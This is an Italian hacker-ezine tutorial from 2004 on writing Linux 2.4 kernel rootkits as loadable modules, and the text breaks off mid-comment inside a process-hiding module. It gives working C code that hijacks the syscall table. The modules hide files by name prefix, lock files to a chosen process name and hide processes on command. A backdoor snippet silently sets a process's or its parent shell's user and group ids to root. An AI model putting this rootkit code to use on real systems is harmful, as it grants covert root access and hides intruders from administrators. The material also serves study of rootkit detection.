================================================================================
---------------------[ BFi13-dev - file 22 - 20/08/2004 ]-----------------------
================================================================================


-[ DiSCLAiMER ]-----------------------------------------------------------------
        Tutto il materiale contenuto in BFi ha fini esclusivamente informativi
        ed educativi. Gli autori di BFi non si riterranno in alcun modo
        responsabili per danni perpetrati a cose o persone causati dall'uso
        di codice, programmi, informazioni, tecniche contenuti all'interno
        della rivista.
        BFi e' libero e autonomo mezzo di espressione; come noi autori siamo
        liberi di scrivere BFi, tu sei libero di continuare a leggere oppure
        di fermarti qui. Pertanto, se ti ritieni offeso dai temi trattati
        e/o dal modo in cui lo sono, * interrompi immediatamente la lettura
        e cancella questi file dal tuo computer * . Proseguendo tu, lettore,
        ti assumi ogni genere di responsabilita` per l'uso che farai delle
        informazioni contenute in BFi.
        Si vieta il posting di BFi in newsgroup e la diffusione di *parti*
        della rivista: distribuite BFi nella sua forma integrale ed originale.
--------------------------------------------------------------------------------


-[ HACKiNG ]--------------------------------------------------------------------
---[ LiNUX KERNEL EViL PR0GRAMMiNG DEMYSTiFiED ]--------------------------------
-----[ Dark-Angel <DarkAngel@antifork.org> http://darkangel.antifork.org ]------


PREMESSA: tutte le tecniche illustrate sono perfettamente funzionanti senza
          modifiche per kernel 2.4.x

PREMOSSA: mettere un kernel 2.4.x per provarle

REQUISITI TECNICI: un minimo di programmazione C

PREREQUISITI ESSENZIALI: Dato che le richieste di donne e denaro che ho fatto
                         negli articoli precedenti non sono state ascoltate,
                         proviamo a mettere "avere un lavoro molto ben pagato
                         da offrirmi", non si sa mai che stavolta qualcuno
                         salti fuori :-)


                                L.K.E.P.D

                Linux Kernel Evil Programming Demystified


" For reasons of efficiency, Linux is not coded in a object-oriented language
like C++ "
                                     - Understanding Linux Kernel 2nd Edition


SEZIONE I
=========

- LE BASI 

Contrariamente ai rootkit user space, quelli kernel space sono decisamente piu'
difficili da scovare, piu' efficaci e, aspetto non indifferente, notevolmente
piu' piccoli. Unico neo, la portabilita', ma nulla e' portabile al 100%
ovunque. Inoltre, non esistono software che siano in grado di rilevarli tutti,
e quelli che ci sono hanno ampi margini di errore, ma di questo discuteremo in
seguito.
L'hacking a kernel space viene effettuato praticamente nella totalita' dei
casi attraverso LKMs, ovvero Loadable Kernel Modules.
I moduli sono utilizzati dal kernel per ampliare le proprie funzionalita',
possono essere caricati in qualsiasi momento dal root od anche dal kernel
stesso qualora ne avesse bisogno. Attraverso i moduli possiamo aggiungere
supporti al kernel senza doverlo necessariamente ricompilare, tant'e' che
molti device drivers sono realizzati tramite moduli.
Ora vediamone la struttura. Ogni modulo ha perlomeno due funzioni:

int init_module(void) 
void cleanup_module(void) 

L'init_module e' la funzione che viene eseguita al momento del caricamento del
modulo nel kernel, la cleanup_module quella che viene eseguita alla sua
rimozione. A parte questo la loro struttura e' come quella di un qualsiasi
altro programma. Cambiano solo alcune cose dovute al fatto che stiamo lavorando
a kernel space e non ad user space, ma le vedremo gradatamente strada facendo.
Un esempio credo sia piu' utile di mille parole, percio' proviamo a stampare
"ciao mondo" con un modulo. Non preoccupatevi se non capite il senso di alcuni
pezzi di codice, verranno spiegati in seguito.

<-| LKEPD/hello.c |->
#define __KERNEL__ 
#define MODULE
#define LINUX
#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
/* Include per i moduli */

int init_module(void) {

	printk("<1>Ciao Mondo\n");

	return 0;
}

void cleanup_module(void) {
	printk("<1>Modulo rimosso\n");
}
<-X->

I primi tre #define servono semplicemente per dire che questo e' un modulo.
CONFIG_MODVERSIONS e' stato creato per far si' che si possa caricare il modulo
in qualsiasi kernel, restando consci del fatto che il caricamento fallira' se
una qualsiasi struttura, tipo o funzione che il modulo usa e' cambiata.
Se il kernel non e' stato compilato con CONFIG_MODVERSIONS si potranno caricare
solamente moduli che sono stati compilati specificatamente per quel kernel e
senza il MODVERSIONS abilitato.
Se invece e' stato compilato con CONFIG_MODVERSIONS abilitato si potranno
caricare moduli compilati per quel kernel con MODVERSIONS disabilitato, ma
saremo anche in grado di caricare moduli con MODVERSIONS attivo fin quando le
API che utilizza il modulo non cambieranno.
printk e' l'equivalente a kernel space della printf. I numeretti tra <> sono
opzionali e servono per indicare la priorita' del messaggio che verra'
stampato.
Esistono 9 livelli e piu' il numero e' basso piu' indica una priorita' alta.
Bene, ora compiliamo:

Vortex:~# gcc -c -I /usr/src/linux/include -O3 hello.c -o hello.o

Notate che dobbiamo abilitare l'ottimizzazione del gcc con -O perche' molte
funzioni sono dichiarate inline[1] negli header e gcc non le espande senza
ottimizzazione.
A questo punto possiamo:
- Inserire il modulo col comando "insmod".
- Guardare i moduli presenti nel kernel col comando "lsmod".
- Rimuovere il nostro modulo col comando "rmmod"[2].

Vortex:~# insmod hello.o
Ciao Mondo
Vortex:~# lsmod
Module                  Size  Used by    Not tainted
hello                    272   0  (unused)
Vortex:~# rmmod hello
Modulo rimosso

[Se state eseguendo questo da una sessione X probabilmente non riceverete
output, questo per via della configurazione di klogd. Usate dmesg per vedere i
messaggi del kernel e dovrebbero apparire anche le scritte]

Altri due concetti molto importanti sono la Kernel Symbol Table e quello di
Syscall.
Nel contesto della programmazione un simbolo e' un blocco costituente di un
programma, puo' essere il nome di una variabile o di una funzione, ed il kernel
non fa eccezione.
In /proc/ksyms possiamo leggere tutti i simboli esportati [ovvero pubblici] del
kernel, a cui possiamo accedere dai nostri moduli. Quando inseriamo un modulo
tutti i suoi simboli diventano pubblici, cosa che nel nostro contesto e' da
evitare assolutamente, percio' ricordatevi di utilizzare la macro
EXPORT_NO_SYMBOLS per evitarlo.

Ogni sistema operativo ha delle funzioni all'interno del suo kernel che
vengono utilizzate per praticamente tutte le operazioni. Quelle funzioni sono
le syscall, possiamo vederle come un'interfaccia con il kernel. Potete trovare
la loro lista completa in <bits/syscall.h> .
Naturalmente non occorre ricordarle tutte, vedremo man mano quelle che
serviranno e come individuare syscall interessanti.
Facciamo subito un esempio, mettiamo di voler creare un modulo che impedisca la
creazione di directory con la sottostringa "admin" nel nome.
Innanzitutto controlliamo con "strace" cosa succede quando utilizziamo il
comando mkdir per creare una directory:

Vortex:~# strace mkdir pippo
execve("/bin/mkdir", ["mkdir", "pippo"], [/* 24 vars */]) = 0
uname({sys="Linux", node="Vortex", ...}) = 0
brk(0)                                  = 0x804cd48
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=24152, ...}) = 0
old_mmap(NULL, 24152, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40012000
close(3)                                = 0
open("/lib/libc.so.6", O_RDONLY)        = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\275Z\1"..., 1024) = 102
4
fstat64(3, {st_mode=S_IFREG|0755, st_size=1104040, ...}) = 0
old_mmap(NULL, 1113796, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0x40018000
mprotect(0x40120000, 32452, PROT_NONE)  = 0
old_mmap(0x40120000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x10
7000) = 0x40120000
old_mmap(0x40126000, 7876, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONY
MOUS, -1, 0) = 0x40126000
close(3)                                = 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0
x40128000
munmap(0x40012000, 24152)               = 0
brk(0)                                  = 0x804cd48
brk(0x804dd48)                          = 0x804dd48
brk(0)                                  = 0x804dd48
brk(0x804e000)                          = 0x804e000
umask(0)                                = 022
umask(022)                              = 0
mkdir("pippo", 0777)                    = 0
exit_group(0)                           = ?

Come potete vedere nella penultima riga, abbiamo una chiamata dal nome
piuttosto interessante. Proviamo a guardare nella man page:

int mkdir(const char *pathname, mode_t mode);

ottimo, corrisponde, proviamo ad intercettare la sys_mkdir allora.
Intercettare una syscall e' molto semplice:
innanzitutto nel nostro modulo dovremo dichiarare la sys_call_table come
extern, e' un simbolo esportato percio' sara' risolto al momento
dell'inserimento da insmod.
Ma che cos'e' la sys_call_table? La sys call table e' un array di puntatori
dove ciascun campo contiene un puntatore ad una sys call. Chiaramente
modificando uno qualsiasi di questi campi si va a cambiare la funzione che
verra' chiamata quando quella sys call verra' invocata. Ad esempio, se il
puntatore in sys_call_table[0] punta alla funzione "true_func", cambiandolo e
facendolo puntare a "fake_func" fara' in modo che quando la sys call numero 0
verra' invocata la funzione ad essere eseguita sara' fake_func e non
true_func.
In secondo luogo dobbiamo dichiarare un puntatore a funzione, che faremo
puntare alla sys call originale, in modo da poterla utilizzare una volta
sostituito il puntatore nella sys call table con uno ad una nostra funzione.
Eccone l'implementazione:

<-| LKEPD/noadm.c |->
#define __KERNEL__
#define MODULE
#define LINUX
#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
#endif

#include <linux/module.h>
#include <linux/kernel.h>
#include <sys/syscall.h>
#include <string.h> 

extern void *sys_call_table[];
/* Va dichiarata come extern per poterci accedere */

int (*old_mkdir)(char *, int);
/* Useremo questo puntatore a funzione per
 * memorizzare l'indirizzo della syscall originale
 */

int new_mkdir(char *name,int mode) {

	if(strstr(name,"admin"))
		return -1;

	return old_mkdir(name,mode);
	/* Nel caso non ci sia "admin" nel nome
	 * richiama la syscall originale per completare
	 * il lavoro
	 */
}

int init_module(void) {

old_mkdir=sys_call_table[SYS_mkdir];
/* Ora old_mkdir punta alla sys_mkdir originale */

sys_call_table[SYS_mkdir]=new_mkdir;
/* Il puntatore alla sys_mkdir nella table viene sovrascritto
 * con l'indirizzo della nostra funzione
 */

EXPORT_NO_SYMBOLS;
/* Ricordate? Non dobbiamo esportare simboli */

return 0;
}

void cleanup_module(void) {

sys_call_table[SYS_mkdir]=old_mkdir;
/* Ripristiniamo il valore corretto nella table */

}
<-X->

Come potete vedere intercettare una syscall e' estremamente semplice.
Inseriamo il modulo e proviamo a creare la directory pippoadmin:

Vortex:~# insmod noadm.o
Vortex:~# mkdir /tmp/pippoadmin
mkdir: cannot create directory `pippoadmin': Operation not permitted
Vortex:~#

Magnifico, sembra che funzioni, ora rimuoviamolo e riproviamo:

Vortex:~# rmmod noadm
Vortex:~# mkdir pippoadmin
Vortex:~#

perfetto.

Note:

[1] Tuttavia un'ottimizzazione superiore a -O2 puo essere rischiosa perche' il
compilatore puo' espandere come se fossero inline funzioni che non lo sono.
Questo e' un problema perche' certe funzioni si aspettano una determinata
struttura dello stack quando vengono chiamate.
[2] Ovviamente e' possibile rimuovere un modulo solamente quando il suo usage
count e' pari a zero.


- COME NASCONDERE UN FILE

Ecco, ora iniziano le cose divertenti. Innanzitutto, come ho precedentemente
detto, dobbiamo ricorrere a strace per vedere che syscall vengono chiamate
durante l'esecuzione del comando.

(Tralascio gran parte dell'output in quanto non rilevante)

Vortex:~# strace ls
.
.
getdents64(3, /* 2 entries */, 4096)    = 48
.
.
Vortex:~#

Proviamo a controllare il man cosa ci dice circa questa funzione:[1]

getdents - get directory entries

Ottimo, esattamente quello che cercavamo[2].
Ora guardiamo il prototipo di un'ipotetica getdents64 ed analizziamone i
parametri: [3]

int n_getdents64(unsigned int fd, struct linux_dirent64 *dirp,
                 unsigned int count)

fd:    e' il file descriptor da cui la funzione andra' a leggere.

dirp:  e' la zona di memoria in cui la funzione andra' a scrivere le varie
       struct linux_dirent64 lette.

count: e' la dimensione della zona di memoria dove andremo a scrivere.

Una struttura linux_dirent64 e' l'equivalente a 64 bit della struttura dirent,
che, in parole povere, non e' altro che la rappresentazione di un file.

struct linux_dirent64 {
       u64             d_ino;     /* Inode (per ora non pensateci, ne parleremo
                                     in seguito) */
       s64             d_off;     /* Offset alla prossima entry */
       unsigned short  d_reclen;  /* Lunghezza di questa entry */
       unsigned char   d_type;    /* Tipo dell'entry: directory, file normale,
                                     socket... */
       char            d_name[0]; /* Puntatore all'inizio del nome */
}

Quello che dovremo fare percio' sara':

1) Redirigere la sys_getdents64 .
2) Chiamare la sys_getdents64 originale e passargli i parametri che abbiamo
   ottenuto tramite le redirezione.
3) Filtrare i risultati e far sparire le cose scomode.

Ricordiamoci pero' che noi andremo a modificare la sys call chiamata dalla
funzione user space getdents, non la funzione stessa! Sembra un'inezia, ma c'e'
una grossa differenza: le syscall lavorano a kernel space mentre le funzioni
con le quali siamo abituati ad operare lavorano ad userspace. Come potete
immaginare da kernel space non possiamo accedere direttamente alla memoria
user space che, guarda caso, e' dove verranno memorizzati i risultati della
nostra chiamata alla sys_getdents64 originale.
Fortunatamente il kernel ci viene incontro, ma vedremo dopo.

Per il punto 1 ed il punto 2 della nostra lista non ci dovrebbero essere
problemi, e' esattamente quello che abbiamo fatto prima con la mkdir, mentre
per il punto 3 potremmo semplicemente guardare tutte le strutture che la
sys_getdents64 mettera' nel buffer per noi ed eliminare quelle scomode.
Vediamone una possibile implementazione:

<-| LKEPD/hide.c |->
#define __KERNEL__
#define MODULE
#define LINUX
#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
#endif
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/dirent.h>
#include <linux/unistd.h>
#include <linux/mm.h>
#include <asm/uaccess.h>
#include <sys/syscall.h>

struct linux_dirent64 {
       u64             d_ino;
       s64             d_off;
       unsigned short  d_reclen;
       unsigned char   d_type;
       char            d_name[0];
};

extern void    *sys_call_table[];
char           *hide = "dark_"; /* Tutti i files aventi questo prefisso nel
                                   nome saranno invisibili */
long           (*o_getdents64) (unsigned int fd,
				 struct linux_dirent64 * dirp,
				 unsigned int count);

long
n_getdents64(unsigned int fd, struct linux_dirent64 *dirp,
	     unsigned int count)
{
    struct linux_dirent64 *dir,*ptr,
                   *tmp,
                   *prev = NULL;
    long             i,rec=0,
                    ret = (*o_getdents64) (fd, dirp, count);
    if (ret <= 0)
	return ret; /* In caso di errore ci limitiamo a restituirlo */

    /* Allochiamo della memoria a kernel space tramite la funzione kmalloc,
       come potete immaginare e' l'equivalente a kernel della malloc. Dobbiamo
       dirgli quanta memoria e di che "tipo", noi dovremo mettere sempre il
       valore GFP_KERNEL .
       Qui kmallochiamo "ret" bytes, ovvero esattamente il numero che ci ha
       restituito la funzione originale.
    */
    if ((tmp = (struct linux_dirent64 *) kmalloc(ret, GFP_KERNEL)) == NULL)
	return ret;
	
    /* Ecco qui la soluzione all'inghippo kernel space <-> user space: abbiamo
       2 funzioni, la copy_from_user e la copy_to_user che si occupano di
       copiare dati da/a user space.
       Noi copieremo a kernel space i dati restituiti ad user space dalla
       funzione originale.
    */

    copy_from_user(tmp, dirp, ret);
    ptr= dir = tmp;
    i = ret;
    
    /* Ecco il ciclo principale del programma: 
       abbiamo un puntatore alla prima entry e la esaminiamo, nel caso non la
       riconosca (tramite strncmp) come indesiderata incrementa il puntatore di
       d_reclen bytes (ovvero la dimensione dell'entry in esame) ed il ciclo
       continua. Nel caso opposto invece viene aumentata la dimensione
       dell'entry precedente di un numero di bytes pari alla dimensione della
       corrente, poi azzeriamo la memoria occupata dall'entry corrente. In caso
       dovessimo rimuovere la prima della lista dobbiamo solo incrementare il
       puntatore e diminuire il numero di bytes da ritornare, tagliando cosi'
       via il primo risultato. Il ciclo continua fino a che il numero di bytes
       analizzati e' minore rispetto al numero di quelli ritornati dalla
       sys_getdents64 originale.
     */
   
    while (((unsigned long ) dir) < (((unsigned long) tmp) + i)) {
	rec=dir->d_reclen;
	if (strncmp(hide, dir->d_name,strlen(hide))==0) {
	    if (!prev) {
		ret -= rec;
		ptr =
		    (struct linux_dirent64 *) (((unsigned long) dir) +rec);
	    } else {
		
		prev->d_reclen += rec;
		memset(dir, 0, rec);

	    }
	} else
	    prev = dir;
	dir=(struct linux_dirent64 *)(((unsigned long)dir)+rec);
    
    }
    /* Copiamo ad user space il risultato */
    copy_to_user(dirp,ptr,ret);
    
    /* Liberiamo la memoria kmallocata */
    kfree(tmp);
    
    return ret;

}

int
init_module(void)
{
    o_getdents64 = sys_call_table[SYS_getdents64];
    sys_call_table[SYS_getdents64] = n_getdents64;
    return 0;
}
void
cleanup_module(void)
{
    sys_call_table[SYS_getdents64] = o_getdents64;
}
/* 
Questa linea serve dai 2.4.9 in avanti, nel caso la omettessimo
il kernel risulterebbe "tainted". Se il vostro kernel e' precedente 
rimuovetela pure.
*/
MODULE_LICENSE("GPL");
<-X->

Vortex:~# touch dark_test
Vortex:~# ls
drwxrwxrwt    5 root     root         4096 Feb  9 21:05 ./
drwxr-xr-x   22 root     root         4096 Feb  6 05:20 ../
-rw-r--r--    1 root     root            0 Feb  9 21:06 dark_test
Vortex:~# gcc -c -O3 -I /usr/src/linux/include/ hide.c -o hide.o
Vortex:~# insmod hide.o
Vortex:~# ls
drwxrwxrwt    5 root     root         4096 Feb  9 21:05 ./
drwxr-xr-x   22 root     root         4096 Feb  6 05:20 ../
Vortex:~#

Ok, funziona. NB: il file non sara' visibile in questo modo, ma sara' comunque
visibile/accessibile per operazioni/applicazioni che lo bersagliano
direttamente, quali cat ad esempio. Come fare per evitare anche questo lo
vedremo fra poco.

Note:
[1] getdents e getdents64 sono equivalenti ai nostri scopi, e' documentata la
getdents, ma nei kernel recenti viene utilizzata la getdents64.
[2] Per informazioni piu' specifiche su questa funzione guardate il manuale.
[3] La variazione dei parametri e' fatta osservando la sys_getdents64 nel file
fs/readdir.c dei sorgenti del kernel


SEZIONE II 
==========

- RENDERE INACCESSIBILE UN FILE

Come potete immaginare impedire l'accesso ad un file non e' nulla di complesso,
basta semplicemente redirigere la sys_open ed effettuare un controllo come
nella redirezione della sys_mkdir di esempio. Cosi' facendo pero' non potremo
accederci nemmeno noi, percio' dobbiamo escogitare un qualche sistema che ci
permetta di farlo senza problemi.
Potremmo, ad esempio, far si' che solo un determinato processo possa aprire il
file o, meglio ancora, far si' che solo un determinato utente possa farlo. In
linux/sched.h dei sorgenti del kernel e' definita una struttura _estremamente_
interessante, la struct task_struct. Questa rappresenta la struttura di un
processo in memoria e contiene informazioni come il nome del processo, i suoi
privilegi e molto altro. Per ovvi motivi non posso spiegarvi tutta la
struttura, ne parlero' solo un po' per volta in base a quello che ci
servira'[1]. Ora, mettiamo il caso di voler far si' che solo un programma che
si chiami "pippo" possa aprire il file.
Dovremo:

1) Redirigere la sys_open.
2) Controllare il file che sta cercando di aprire.
3) Se il file e' nascosto ed il programma che sta cercando di accederci si
   chiama pippo attiviamo la open originale, altrimenti ritorniamo un errore.

Sembra facile, ma come facciamo a sapere quale programma sta tentando di
accederci? Basta controllare il campo della task_struct che rappresenta il
processo corrente che ne contiene il nome, precisamente il campo comm.
Percio' bastera' un semplicissimo strcmp(processo->comm,"pippo") per effettuare
questo controllo. Il problema ora sembrerebbe trovare in memoria qual e' la
task_struct che rappresenta il processo corrente, ma fortunatamente il kernel
ci viene in aiuto fornendoci un puntatore al processo corrente che si chiama
"current". Percio' il nostro controllo si trasformera' in
strcmp(current->comm,"pippo").
Vediamo una piccola implementazione di quando detto finora.

<-| LKEPD/access.c |->
#define __KERNEL__
#define MODULE
#define LINUX
#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
#endif
#include <linux/module.h>
#include <linux/kernel.h>
#include <sys/syscall.h>
#include <linux/sched.h>

char	       *hide = "mio_";
int		(*o_open)(char *,int,int);
extern void * sys_call_table[];
int n_open(char *path,int flags, int mode) {

	if(strstr(path,hide)&& strcmp(current->comm,"pippo"))
		return -ENOENT;
	return o_open(path,flags,mode);
}

int
init_module(void)
{
    o_open = sys_call_table[SYS_open];
    sys_call_table[SYS_open] = n_open;
    EXPORT_NO_SYMBOLS;
    return 0;
}
void
cleanup_module(void)
{
    sys_call_table[SYS_open] = o_open;
}
MODULE_LICENSE("GPL");
<-X->

Proviamolo:
Vortex:~# gcc -c -O3 -I /usr/src/linux/include/ access.c -o access.o
Vortex:~# echo ciao > mio_test
Vortex:~# cat mio_test
ciao
Vortex:~# insmod access.o
Vortex:~# cat mio_test
cat: mio_test: No such file or directory
Vortex:~# cp /bin/cat ./pippo
Vortex:~# ./pippo mio_test
ciao
Vortex:~# 

:)
[2]


- CONSIDERAZIONI

Con l'introduzione della task_struct ed in particolare di current abbiamo messo
a nostra disposizione un potente mezzo per realizzare ogni sorta di nefandezza:
pensate ad esempio al modulo di poco fa, volendo avremmo potuto cambiare i
diritti di accesso del processo corrente per renderlo capace di aprire files a
cui normalmente non avrebbe potuto accedere:

int n_open(char *path,int flags, int mode) {
 
         if (strcmp(current->comm,"pippo")==0)
         {
	         current->uid=
        	 current->euid=
	         current->gid=
        	 current->egid=
	         current->suid=
        	 current->sgid=
	         current->fsuid=
        	 current->fsgid=
	         current->groups[0]=0;
         }
         return o_open(path,flags,mode);
}

Et voila' :)
Con un po' di fantasia si puo fare qualunque cosa, ad esempio si potrebbe
modificare una syscall in modo tale che se lanciata con determinati parametri
nasconda un file, cambi i permessi di un processo o nasconda un altro processo.
Grazie all'accoppiata current/syscall ora siamo in grado di creare dei
primitivi sistemi di occultamento generalizzati: molti rootkit del passato ad
esempio, utilizzando l'hooking della sys_write e controllando che il nome del
processo fosse "netstat", nascondevano determinate connessioni alla vista
dell'amministratore impedendo al processo di "scriverle". Ovviamente questo non
e' l'approccio corretto al problema in quanto facilmente bypassabile anche solo
cambiando nome al programma, ma dovrebbe contribuire a darvi un'idea di che
cosa si riesce a fare.


- ANCORA SUI PROCESSI 

Vediamo ora in maniera un poco piu' approfondita il "processo".
Linux memorizza i processi in una lista a doppia percorrenza (cioe' che puo'
essere scorsa in entrambi i sensi) di strutture task_struct. Direttamente da
sched.h:  struct task_struct *next_task, *prev_task;
Come dicono i nomi stessi delle variabili, quelli sono rispettivamente il
puntatore al processo seguente nella lista ed a quello precedente.
Percio', ad esempio, per scorrere tutti i processi del sistema bastera' fare
una cosa di questo tipo:

struct task_struct *ptr=current;

	do {
		printk("Processo %s\n",ptr->comm);
		ptr=ptr->next_task;
	}
	while(ptr!=current);

Ma come nasce un processo? Semplificando molto, un processo viene "copiato" da
un altro ad opera della sys_fork, poi viene "sovrascritto" con le nuove
informazioni dalla sys_execve. Il processo da cui il nuovo nato e' stato
copiato diventa suo "padre" mentre lui stesso diventa un "figlio" di suo padre.
Ad esempio, se da una shell lanciamo il comando "ps" il processo della shell
sara' il padre di ps.

int n_open(char *path,int flags, int mode) {
 
         if (strcmp(current->comm,"pippo")==0)
         {
                  current->p_pptr->uid=
                  current->p_pptr->euid=
                  current->p_pptr->gid=
                  current->p_pptr->egid=
                  current->p_pptr->suid=
                  current->p_pptr->sgid=
                  current->p_pptr->fsuid=
                  current->p_pptr->fsgid=0;
                  current->p_pptr->groups[0]=0;
         }
         return o_open(path,flags,mode);
}

Modificando in questo modo il codice di poco fa si cambiano i diritti del
padre di pippo. Ovviamente nel caso in cui il padre sia una shell, l'esecuzione
di pippo la rendera' una shell root :)


- COME NASCONDERE I PROCESSI

Vortex:~# strace ps
.
.
open("/proc", O_RDONLY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 5
.
.
getdents64(5, /* 36 entries */, 1024)   = 1016
.
.
Vortex:~#

Come potete vedere viene aperta la directory /proc e viene letto il suo
contenuto. Successivamente le informazioni vengono "raffinate" ed infine
stampate sullo schermo. Proviamo ad andare in /proc ed a vedere cosa c'e':

Vortex:/proc# ls
total 4
dr-xr-xr-x   67 root     root            0 Feb 19 15:18 ./
drwxr-xr-x   22 root     root         4096 Feb  6 05:20 ../
dr-xr-xr-x    3 root     root            0 Feb 20 02:14 1/
dr-xr-xr-x    3 root     root            0 Feb 20 02:14 11/
dr-xr-xr-x    3 root     root            0 Feb 20 02:14 1841/
dr-xr-xr-x    3 root     root            0 Feb 20 02:14 1903/
.
.
Vortex:/proc# cd 1841/
Vortex:/proc/1841# ls
total 0
dr-xr-xr-x    3 root     root            0 Feb 20 02:15 ./
dr-xr-xr-x   65 root     root            0 Feb 19 15:18 ../
-r--r--r--    1 root     root            0 Feb 20 02:15 cmdline
lrwxrwxrwx    1 root     root            0 Feb 20 02:15 cwd -> /root/
-r--------    1 root     root            0 Feb 20 02:15 environ
lrwxrwxrwx    1 root     root            0 Feb 20 02:15 exe -> /usr/bin/vim*
dr-x------    2 root     root            0 Feb 20 02:15 fd/
-r--r--r--    1 root     root            0 Feb 20 02:15 maps
-rw-------    1 root     root            0 Feb 20 02:15 mem
-r--r--r--    1 root     root            0 Feb 20 02:15 mounts
lrwxrwxrwx    1 root     root            0 Feb 20 02:15 root -> //
-r--r--r--    1 root     root            0 Feb 20 02:15 stat
-r--r--r--    1 root     root            0 Feb 20 02:15 statm
-r--r--r--    1 root     root            0 Feb 20 02:15 status
Vortex:/proc/1841#

Come potete vedere in /proc ci sono delle directory dal nome composto da
numeri ed all'interno ci sono informazioni su processi. Il nome corrisponde
al pid del processo e le informazioni contenute all'interno della rispettiva
directory come potete immaginare si riferiscono a lui. Questo e' il "proc file
system", un file system virtuale esistente interamente a kernel space
utilizzato per lo scambio di informazioni. Parleremo in seguito del procfs, per
ora basta che abbiate capito come funziona ps: legge da proc i processi
esistenti, ne prende le informazioni richieste e stampa a schermo. Ancora una
volta percio' la syscall che ci interessa e' la sys_getdents64. Questa volta
pero' faremo qualcosa di piu', implementeremo anche un sistema per
attivare/disattivare l'occultamento di un processo su richiesta.
Innanzitutto dobbiamo prima imparare a capire se ci troviamo in /proc, in modo
da sapere se attivare o no il filtraggio dell'output della getdents64 reale.
Per far questo introduciamo un'altra cosa, l'inode, esattamente lo stesso che
ho detto che avrei spiegato in seguito quando stavo parlando della struttura
linux_dirent64. Vi siete mai chiesti come venga effettivamente memorizzato un
file sul filesystem, come faccia il sistema a sapere dove andare effettivamente
a cercare i bit che lo compongono dal disco rigido o dove sono memorizzate
informazioni tipo la sua dimensione? La risposta e' l'inode.
Ad ogni inode corrisponde un file e viceversa, possiamo dire che un file e' il
suo inode. Percio' bastera' controllare se l'inode associato al file descriptor
che viene passato come parametro alla getdents64 e' quello di /proc e sapremo
se attivare o no il filtraggio. Per riconoscere i processi da nascondere invece
useremo il campo "flags" della task_struct.
Creeremo una maschera ad hoc che metteremo/toglieremo a richiesta attraverso
gli operatori binari | e &. La nostra funzione controllera' la presenza o meno
di questa maschera, cosi' da capire se si trova di fronte un processo nascosto
oppure ad uno "regolare".
Esempio:

<-| LKEPD/mask.c |->
#define MASK 0x1
int main(void) {
int pippo=0;
	pippo|=MASK; // <- Inserisce la mask
	if ((pippo&MASK)==MASK) // <- Ne controlla la presenza
		printf("Mask presente\n");
	else
		printf("Mask assente\n");
	pippo&=~MASK; // <- Toglie la mask

	if ((pippo&MASK)==MASK)
		printf("Mask presente\n");
	else
		printf("Mask assente\n");
	return 0;
}
<-X->

Vortex:~# gcc mask.c -o mask
Vortex:~# ./mask
Mask presente
Mask assente
Vortex:~#

Ora credo che sia chiaro il funzionamento del controllo che andremo ad
effettuare, percio' ora ecco il codice:

<-| LKEPD/prochide.c |->
#define __KERNEL__
#define MODULE
#define LINUX
#ifdef CONFIG_MODVERSIONS
#define MODVERSIONS
#include <linux/modversions.h>
#endif
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/dirent.h>
#include <linux/unistd.h>
#include <linux/mm.h>
#include <asm/uaccess.h>
#include <sys/syscall.h>
#include <linux/proc_fs.h>
#include <linux/smp_lock.h>
struct linux_dirent64 {
       u64             d_ino;
       s64             d_off;
       unsigned short  d_reclen;
       unsigned char   d_type;
       char            d_name[0];
};

extern void    *sys_call_table[];

#define PF_INVISIBLE 	0x20000000 // La nostra mask
#define HIDESIG		333 // Il segnale che usiamo per nascondere un processo
#define UNHIDESIG	666 // Quello che useremo per farlo tornare visibile

long	        (*o_getdents64) (unsigned int fd,
				 struct linux_dirent64 * dirp,
				 unsigned int count);
int		(*o_kill)(int pid, int sig);
/* Sfrutteremo la sys_kill per impartire ordini al nostro modulo */

int n_atoi(char *str) {
	int res = 0;
	int mul = 1;
	char *ptr;
	for (ptr = str + strlen(str) - 1; ptr >= str; ptr--)
	{ if (*ptr < '0' || *ptr > '9')
		return (-1);
		res += (*ptr - '0') * mul;
		mul *= 10;
	}
	return (res);
} 
/* Una reimplementazione della funzione atoi, ci servira' per capire che
processo stiamo analizzando */

struct task_struct *get_task(int pid) {
	struct task_struct *run=current;
	do {
		if(run->pid==pid)
			return run;
		run=run->next_task;
	}
	while(run!=current); 
		
	return NULL;
}
/* Scorriamo la lista dei processi alla ricerca di quello col pid uguale al
parametro passato */


long
n_getdents64(unsigned int fd, struct linux_dirent64 *dirp,
	     unsigned int count)
{
    struct linux_dirent64 *dir,*ptr,
                   *tmp,
                   *prev = NULL;
    long             i,rec=0,
                    ret;
    struct inode *inode;
    struct task_struct *name;   
    ret = (*o_getdents64) (fd, dirp, count);
    if (ret <= 0)
	return ret;
    if ((tmp = (struct linux_dirent64 *) kmalloc(ret, GFP_KERNEL)) == NULL)
	return ret;
    copy_from_user(tmp, dirp, ret);
    ptr= dir = tmp;
    i = ret;
    
    /* Eccoci qui, con questa riga andiamo a scoprire quale inode e' associato
    al file descriptor che ci e' stato passato.
    Da current si passa a files, una struttura di supporto, da li' si accede al
    campo fd che  un array di puntatori a strutture file che indicizziamo col
    valore del nostro file descriptor. Praticamente cosi' accediamo alla
    struttura file associata a quel file descriptor. Una struttura file e' la
    rappresentazione a kernel space di un "file aperto". In sostanza, quando un
    nostro programma fa` una open ne viene creata una. Da li' accediamo al
    dentry (directory entry) un'altra struttura di supporto che tra le altre
    cose contiene il numero dell'inode, proprio quello che stavamo cercando :)
